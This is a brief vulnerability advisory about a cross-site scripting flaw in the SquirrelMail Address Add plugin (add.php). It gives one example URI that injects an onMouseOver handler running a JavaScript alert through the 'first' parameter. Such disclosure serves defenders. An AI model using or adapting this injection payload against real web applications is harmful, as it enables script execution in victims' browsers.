SquirrelMail Address Add Plugin Add.PHP Cross-Site Scripting Vulnerability

SquirrelMail Address Add Plugin Add.PHP Cross-Site Scripting Vulnerability

No exploit is required.

An example URI has been provided:

http://www.example.com/squirrelmail_root_dir/plugins/address_add/add.php?first=HOVER%20ME!%22%20onMouseOver=%22alert('foo');